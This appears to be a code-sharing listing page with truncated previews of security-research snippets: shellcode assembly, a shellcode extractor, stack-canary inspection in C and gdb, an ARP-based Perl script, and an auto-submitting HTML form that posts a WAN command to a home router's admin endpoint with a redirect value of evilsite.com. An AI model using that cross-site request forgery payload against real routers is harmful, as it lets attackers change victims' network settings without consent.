This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/env perl | |
while(<>){ | |
chomp; | |
$uhex = pack('H*', $_); | |
$udec = pack('u', $uhex ); | |
$udec =~s/(^.|[\n\r])//mg; | |
$udec =~tr#` -_#AA-Za-z0-9+/#; | |
print $udec, $/; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<body onload='document.forms[0].submit()'> | |
<form action='http://192.168.0.1/goform/SysStatusHandle' method='post'> | |
<input type="hidden" name="CMD" value="WAN_CON" /> | |
<input type="hidden" name="GO" value="http://evilsite.com" /> | |
<input type="hidden" name="action" value='2' /> | |
</form> | |
</body> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// gcc -c yes.S -o yes.o && gcc yes.o -o yes | |
.file "yes.S" | |
.data | |
y: .string "y" | |
.text | |
.globl main | |
main: | |
cmpq $2, %rdi | |
jl .L1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
.section .text | |
.global _start | |
_start: | |
pushq %rbp | |
movq %rsp, %rbp | |
subq $13, %rsp | |
shellcode: | |
movb $0x05, -1(%rbp) | |
movb $0x0f, -2(%rbp) | |
movb $0xc7, -3(%rbp) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl -w | |
use strict; | |
use warnings; | |
my $bin = $ARGV[0]; | |
my $func= $ARGV[1]; | |
die("./$0 <binary> <function>") if (!defined $bin or !defined $func); | |
my @shellcode; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
_start: | |
xorq %rax, %rax | |
movb $0x3c, %al | |
xorq %rdi, %rdi | |
incb %dil | |
syscall |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(gdb) disas main | |
Dump of assembler code for function main: | |
0x00000000004005ab <+0>: sub $0x18,%rsp | |
0x00000000004005af <+4>: mov %fs:0x28,%rax | |
0x00000000004005b8 <+13>: mov %rax,0x8(%rsp) | |
0x00000000004005bd <+18>: xor %eax,%eax | |
0x00000000004005bf <+20>: callq 0x400566 <get_canary> | |
0x00000000004005c4 <+25>: mov (%rax),%rsi | |
0x00000000004005c7 <+28>: mov $0x400688,%edi | |
0x00000000004005cc <+33>: mov $0x0,%eax |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// gcc -O1 -fstack-protector-all -o main main.c | |
#include <stdio.h> | |
#include <linux/types.h> | |
#ifndef uint64_t | |
typedef unsigned long uint64_t; | |
#endif | |
uint64_t get_canary() { | |
uint64_t a; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl -w | |
use strict; | |
use warnings; | |
use Net::ARP; | |
my $source = "10.0.2.15"; | |
my $dev = "enp0s3"; | |
WHILE: print "\$ "; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// gcc -o get_orig_hwaddr get_orig_hwaddr.c | |
#include <stdio.h> | |
#include <errno.h> | |
#include <string.h> | |
#include <net/if.h> | |
#include <sys/ioctl.h> | |
#include <sys/socket.h> | |
char *get_addr (int fd, struct ifreq *ifrq) { |